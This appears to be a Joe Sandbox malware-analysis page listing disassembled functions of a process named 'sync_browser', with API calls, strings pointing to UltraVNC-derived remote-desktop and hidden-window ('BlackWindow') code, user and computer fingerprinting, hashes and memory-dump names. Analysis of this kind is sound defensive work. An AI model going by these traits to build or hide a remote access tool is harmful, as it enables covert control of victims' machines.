Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (MSIL Processor)$Current user :
API String ID: 171970310-1756215141
Opcode ID: e292ff1ab8a2ec860fca5fdae839fd5dac6431b32c19bd64026a63d2d728b1e0
Instruction ID: f450459aba80ba28f7391aff1030537a66024bc6000b8eb35562b55dfd2e9953
Opcode Fuzzy Hash: e292ff1ab8a2ec860fca5fdae839fd5dac6431b32c19bd64026a63d2d728b1e0
Instruction Fuzzy Hash: 80B17121A0868686E7649B3598006BD7BA0FB45BB4FC04337EA7E87AD5DF2CE515C720

Function 00007FF7D5937A5B Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 239COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 00007FF7D5937C5B

Part of subcall function 00007FF7D59E7C50: _errno.LIBCMT ref: 00007FF7D59E7C88
Part of subcall function 00007FF7D59E7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59E7C93

sprintf.LIBCMT ref: 00007FF7D5937CC6
sprintf.LIBCMT ref: 00007FF7D5937D04
sprintf.LIBCMT ref: 00007FF7D5937D68
GetUserNameA.ADVAPI32 ref: 00007FF7D5937E9C

Strings

ComputerName : , xrefs: 00007FF7D5937F2C
, (MIPS Processor), xrefs: 00007FF7D5937A6A
Service Pack: 6a, xrefs: 00007FF7D5937D5D
IP : , xrefs: 00007FF7D5937FB9
Current user : , xrefs: 00007FF7D5937EA6
%02d, xrefs: 00007FF7D5937CB3
Build:%d, xrefs: 00007FF7D5937CF9
v%d., xrefs: 00007FF7D5937C50

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (MIPS Processor)$Current user :
API String ID: 171970310-18614430
Opcode ID: 13559806fcd846485afb22cc621461796e5ecc486d2cf5f10f95b5e9e7543de7
Instruction ID: ae35ac4db920dbd815ecb3abf97967f60d415ef68926393ead81966ff2b6ae3f
Opcode Fuzzy Hash: 13559806fcd846485afb22cc621461796e5ecc486d2cf5f10f95b5e9e7543de7
Instruction Fuzzy Hash: 84B18121A0868686E7649B3598006BD7BA0FB45BB4FC04337EE7E87AD5DF2CE515C320

Function 00007FF7D5937ACF Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 00007FF7D5937C5B

Part of subcall function 00007FF7D59E7C50: _errno.LIBCMT ref: 00007FF7D59E7C88
Part of subcall function 00007FF7D59E7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59E7C93

sprintf.LIBCMT ref: 00007FF7D5937CC6
sprintf.LIBCMT ref: 00007FF7D5937D04
sprintf.LIBCMT ref: 00007FF7D5937D68
GetUserNameA.ADVAPI32 ref: 00007FF7D5937E9C

Strings

ComputerName : , xrefs: 00007FF7D5937F2C
Service Pack: 6a, xrefs: 00007FF7D5937D5D
IP : , xrefs: 00007FF7D5937FB9
Current user : , xrefs: 00007FF7D5937EA6
, (SHX Processor), xrefs: 00007FF7D5937ADE
%02d, xrefs: 00007FF7D5937CB3
Build:%d, xrefs: 00007FF7D5937CF9
v%d., xrefs: 00007FF7D5937C50

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (SHX Processor)$Current user :
API String ID: 171970310-3227166451
Opcode ID: f87aec30509e434426b08c2f6c773820ec2921cd93d1ed894a2fb9928649058d
Instruction ID: f29115c82e7fe9b1bba122e868ddbe69675ce4508770d38f1e3ce4a06ab458c0
Opcode Fuzzy Hash: f87aec30509e434426b08c2f6c773820ec2921cd93d1ed894a2fb9928649058d
Instruction Fuzzy Hash: AAB17F21A0868686EB64DB3598006BD77A0FB45BB4FC04337EA7E87AD5DF2CE555C320

Function 00007FF7D5937A9A Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 00007FF7D5937C5B

Part of subcall function 00007FF7D59E7C50: _errno.LIBCMT ref: 00007FF7D59E7C88
Part of subcall function 00007FF7D59E7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59E7C93

sprintf.LIBCMT ref: 00007FF7D5937CC6
sprintf.LIBCMT ref: 00007FF7D5937D04
sprintf.LIBCMT ref: 00007FF7D5937D68
GetUserNameA.ADVAPI32 ref: 00007FF7D5937E9C

Strings

ComputerName : , xrefs: 00007FF7D5937F2C
Service Pack: 6a, xrefs: 00007FF7D5937D5D
IP : , xrefs: 00007FF7D5937FB9
, (ARM Processor), xrefs: 00007FF7D5937AA9
Current user : , xrefs: 00007FF7D5937EA6
%02d, xrefs: 00007FF7D5937CB3
Build:%d, xrefs: 00007FF7D5937CF9
v%d., xrefs: 00007FF7D5937C50

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (ARM Processor)$Current user :
API String ID: 171970310-978419383
Opcode ID: a8d8f491f9732d8cee92c56ad349269dc42da93c27ec5ad26cc636e7eff597dc
Instruction ID: 8b141bc3231a1c10f4883cedccaccb682fe62146dbb4fd4443ec5a817e712dfa
Opcode Fuzzy Hash: a8d8f491f9732d8cee92c56ad349269dc42da93c27ec5ad26cc636e7eff597dc
Instruction Fuzzy Hash: 3BB17F21A0868686EB649B3598006BD77A0FB45BB4FC04337EA7E87AD5DF2CE515C320

Function 00007FF7D5937B04 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 00007FF7D5937C5B

Part of subcall function 00007FF7D59E7C50: _errno.LIBCMT ref: 00007FF7D59E7C88
Part of subcall function 00007FF7D59E7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59E7C93

sprintf.LIBCMT ref: 00007FF7D5937CC6
sprintf.LIBCMT ref: 00007FF7D5937D04
sprintf.LIBCMT ref: 00007FF7D5937D68
GetUserNameA.ADVAPI32 ref: 00007FF7D5937E9C

Strings

ComputerName : , xrefs: 00007FF7D5937F2C
Service Pack: 6a, xrefs: 00007FF7D5937D5D
IP : , xrefs: 00007FF7D5937FB9
Current user : , xrefs: 00007FF7D5937EA6
%02d, xrefs: 00007FF7D5937CB3
, (Alpha Processor), xrefs: 00007FF7D5937B13
Build:%d, xrefs: 00007FF7D5937CF9
v%d., xrefs: 00007FF7D5937C50

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Alpha Processor)$Current user :
API String ID: 171970310-733379141
Opcode ID: fb41818708b430e62bf73831d052d0c4d926f05be827444239f89a711e28a3fb
Instruction ID: 467de048e6a4e7f3c5e54bb65c35d3f6d5575e127132bc04aa8a2a48d79f9bfd
Opcode Fuzzy Hash: fb41818708b430e62bf73831d052d0c4d926f05be827444239f89a711e28a3fb
Instruction Fuzzy Hash: 4AB16021A0868686EB64DB3598006BD77A0FB45BB4FC04337EA7E87AD5DF28E515C720

Function 00007FF7D59379E9 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 00007FF7D5937C5B

Part of subcall function 00007FF7D59E7C50: _errno.LIBCMT ref: 00007FF7D59E7C88
Part of subcall function 00007FF7D59E7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59E7C93

sprintf.LIBCMT ref: 00007FF7D5937CC6
sprintf.LIBCMT ref: 00007FF7D5937D04
sprintf.LIBCMT ref: 00007FF7D5937D68
GetUserNameA.ADVAPI32 ref: 00007FF7D5937E9C

Strings

ComputerName : , xrefs: 00007FF7D5937F2C
Service Pack: 6a, xrefs: 00007FF7D5937D5D
IP : , xrefs: 00007FF7D5937FB9
Current user : , xrefs: 00007FF7D5937EA6
%02d, xrefs: 00007FF7D5937CB3
Build:%d, xrefs: 00007FF7D5937CF9
, (Intel Processor), xrefs: 00007FF7D59379F8
v%d., xrefs: 00007FF7D5937C50

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Intel Processor)$Current user :
API String ID: 171970310-3029765189
Opcode ID: 1cb7e10b7cb412b861b46b02bdf6de15515886615ce791076c371ea6f230fb72
Instruction ID: 7834c953792800490e2c6c647c68fe612cbf20a0c382cf397acfe6113e2910bd
Opcode Fuzzy Hash: 1cb7e10b7cb412b861b46b02bdf6de15515886615ce791076c371ea6f230fb72
Instruction Fuzzy Hash: FAB17121A0868686EB64DB3598006BD77A0FB45BB4FC04337EA7E87AD5DF28E515C720

Function 00007FF7D5934200 Relevance: 29.8, APIs: 11, Strings: 6, Instructions: 90threadwindowCOMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF7D5934229
GetCurrentThreadId.KERNEL32 ref: 00007FF7D5934253
GetThreadDesktop.USER32 ref: 00007FF7D593425B
GetUserObjectInformationA.USER32 ref: 00007FF7D593428A
SetThreadDesktop.USER32 ref: 00007FF7D59342D0
GetMessageA.USER32 ref: 00007FF7D5934301
TranslateMessage.USER32 ref: 00007FF7D5934315
DispatchMessageA.USER32 ref: 00007FF7D5934320
GetMessageA.USER32 ref: 00007FF7D5934333
SetThreadDesktop.USER32 ref: 00007FF7D5934355
CloseDesktop.USER32 ref: 00007FF7D5934363

Strings

black_layered.cpp : SelectHDESK:!SetThreadDesktop , xrefs: 00007FF7D59342DA
black_layered.cpp : !GetUserObjectInformation , xrefs: 00007FF7D5934294
black_layered.cpp : OpenInputdesktop Error , xrefs: 00007FF7D593423B
black_layered.cpp : end BlackWindow , xrefs: 00007FF7D593433D
black_layered.cpp : SelectHDESK to %s (%x) from %x, xrefs: 00007FF7D59342AE
black_layered.cpp : OpenInputdesktop OK, xrefs: 00007FF7D5934247

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$MessageThread$CloseCurrentDispatchInformationInputObjectOpenTranslateUser
String ID: black_layered.cpp : !GetUserObjectInformation $black_layered.cpp : OpenInputdesktop Error $black_layered.cpp : OpenInputdesktop OK$black_layered.cpp : SelectHDESK to %s (%x) from %x$black_layered.cpp : SelectHDESK:!SetThreadDesktop $black_layered.cpp : end BlackWindow
API String ID: 2763862709-1375279643
Opcode ID: 97dc65336ba64628ca373ffe4e0f0f58b485fa95820c520cbe5a523dd1110f8f
Instruction ID: 6918a1fe2596601bb15819be0943f4d02e7fa8f14e908f6721a9229f6d8b5889
Opcode Fuzzy Hash: 97dc65336ba64628ca373ffe4e0f0f58b485fa95820c520cbe5a523dd1110f8f
Instruction Fuzzy Hash: 4D414121A1869393FA18BB75A854ABEA790EFC4F98FC44033DD4E56568DF3CD105C760

Function 00007FF7D59426B0 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 78librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF7D59426E0
LoadLibraryA.KERNEL32 ref: 00007FF7D59426F0

Part of subcall function 00007FF7D5942520: LoadLibraryA.KERNEL32 ref: 00007FF7D5942551
Part of subcall function 00007FF7D5942520: GetProcAddress.KERNEL32 ref: 00007FF7D594256E
Part of subcall function 00007FF7D5942520: LoadLibraryA.KERNEL32 ref: 00007FF7D594258B
Part of subcall function 00007FF7D5942520: GetProcAddress.KERNEL32 ref: 00007FF7D59425A8
Part of subcall function 00007FF7D5942520: FreeLibrary.KERNEL32 ref: 00007FF7D5942658
Part of subcall function 00007FF7D5942520: FreeLibrary.KERNEL32 ref: 00007FF7D5942667

GetProcAddress.KERNEL32 ref: 00007FF7D5942719
GetProcAddress.KERNEL32 ref: 00007FF7D5942731
Sleep.KERNEL32 ref: 00007FF7D5942771
GetLastError.KERNEL32 ref: 00007FF7D594277D
sprintf.LIBCMT ref: 00007FF7D5942792
OutputDebugStringA.KERNEL32 ref: 00007FF7D594279C
Sleep.KERNEL32 ref: 00007FF7D59427A7
FreeLibrary.KERNEL32 ref: 00007FF7D59427B5
FreeLibrary.KERNEL32 ref: 00007FF7D59427C3

Strings

WinStationConnectW, xrefs: 00007FF7D594270F
LockWorkStation, xrefs: 00007FF7D5942727
LockWorkstation failed with error 0x%0X, xrefs: 00007FF7D5942783
winsta.dll, xrefs: 00007FF7D59426D9
user32.dll, xrefs: 00007FF7D59426E6

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc$Sleep$DebugErrorLastOutputStringsprintf
String ID: LockWorkStation$LockWorkstation failed with error 0x%0X$WinStationConnectW$user32.dll$winsta.dll
API String ID: 2931780912-670137772
Opcode ID: 4c941a38a0d861067d34bbbc45676cf3eae1c23976c0e3f2b532e901046bab96
Instruction ID: 161981cb16403b3a4dcdf3303bbe2efef9541a7064eb44411a77b15b167dc2ff
Opcode Fuzzy Hash: 4c941a38a0d861067d34bbbc45676cf3eae1c23976c0e3f2b532e901046bab96
Instruction Fuzzy Hash: 17316D25A19A5687EE18BF65A454ABEA7A0FF94F84FC81032DE0E03654DF3CE805C334

Function 00007FF7D593D560 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 128processthreadCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF7D593D5A2
FindWindowA.USER32 ref: 00007FF7D593D675
GetWindowThreadProcessId.USER32 ref: 00007FF7D593D690
OpenProcess.KERNEL32 ref: 00007FF7D593D6AB
OpenProcessToken.ADVAPI32 ref: 00007FF7D593D6CA
CreateProcessAsUserA.ADVAPI32 ref: 00007FF7D593D70C
GetLastError.KERNEL32 ref: 00007FF7D593D712
CloseHandle.KERNEL32 ref: 00007FF7D593D71D
CloseHandle.KERNEL32 ref: 00007FF7D593D72D
CloseHandle.KERNEL32 ref: 00007FF7D593D73D
CloseHandle.KERNEL32 ref: 00007FF7D593D74D

Strings

-settingshelper, xrefs: 00007FF7D593D5CF
Winsta0\Default, xrefs: 00007FF7D593D64E
Shell_TrayWnd, xrefs: 00007FF7D593D655

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseHandleProcess$OpenWindow$CreateErrorFileFindLastModuleNameThreadTokenUser
String ID: -settingshelper$Shell_TrayWnd$Winsta0\Default
API String ID: 421869683-3362258117
Opcode ID: 3590b074e5f29d85f71debabe8de06fed850c3c5fd9db8f8af18c013e671a393
Instruction ID: 5db32c5dc391e3378fbd9685354a475afbe94d10a5ab0957d993809054ce92e2
Opcode Fuzzy Hash: 3590b074e5f29d85f71debabe8de06fed850c3c5fd9db8f8af18c013e671a393
Instruction Fuzzy Hash: DA51B432A18B5186E7149F25A8506ADBBA4FF88B94FC44236EE5D43B98CF3CE115C750

Function 00007FF7D5946930 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 180windowCOMMON

Download Yara Rule

APIs

free.LIBCMT ref: 00007FF7D5946987

Part of subcall function 00007FF7D59E8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C0A
Part of subcall function 00007FF7D59E8BF4: _errno.LIBCMT ref: 00007FF7D59E8C14
Part of subcall function 00007FF7D59E8BF4: GetLastError.KERNEL32(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C1C

Part of subcall function 00007FF7D59470B0: EnumDisplaySettingsA.USER32 ref: 00007FF7D59470F4
Part of subcall function 00007FF7D59470B0: LoadLibraryA.KERNEL32 ref: 00007FF7D5947109
Part of subcall function 00007FF7D59470B0: GetProcAddress.KERNEL32 ref: 00007FF7D594712D
Part of subcall function 00007FF7D59470B0: FreeLibrary.KERNEL32 ref: 00007FF7D59471F2

malloc.LIBCMT ref: 00007FF7D5946996
GetDC.USER32 ref: 00007FF7D5946A00
GetSystemPaletteEntries.GDI32 ref: 00007FF7D5946A2A
GetLastError.KERNEL32 ref: 00007FF7D5946A33
DeleteDC.GDI32 ref: 00007FF7D5946A64
ReleaseDC.USER32 ref: 00007FF7D5946A71

Strings

l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF7D594695B
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF7D59469A4
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF7D5946A0B
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF7D5946BB2
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF7D59469F2
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF7D5946A39

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
